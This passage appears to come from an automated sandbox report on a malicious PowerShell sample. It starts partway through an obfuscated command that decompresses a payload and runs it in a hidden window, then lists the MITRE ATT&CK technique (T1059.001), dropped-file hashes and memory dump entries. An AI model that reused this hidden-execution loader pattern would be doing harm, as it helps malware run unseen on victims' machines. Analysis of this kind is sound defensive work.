xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}'')-f''='',''f'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';.UseShellExecute=False;.RedirectStandardOutput=True;.WindowStyle='Hidden';.CreateNoWindow=True;=[System.Diagnostics.Process]::Start();"
    3⤵
    PID:2216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8513bfbeea11d6d61b87c8b7123a4f9c

SHA1
76e324146aef6e0267a0b21d9f1d6c46cb7ae366

SHA256
f33f31267c0f07232285fad1f44b35588fd3c5681fd8fd900544157689c8e184

SHA512
bb47f09e7fbd22744d3b373664440789fb8465fd477cb1c6df5803ceca3dcc545d24d53ad78c9854546fc33bfe213bf8d0c91f4dc4e3a41b25a42af982551af4

Download Submit
memory/1696-15-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/1696-16-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-4-0x000007FEF558E000-0x000007FEF558F000-memory.dmp

Filesize
4KB

Download
memory/2692-5-0x000000001B830000-0x000000001BB12000-memory.dmp

Filesize
2.9MB

Download
memory/2692-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Filesize
32KB

Download
memory/2692-7-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-8-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-9-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-17-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing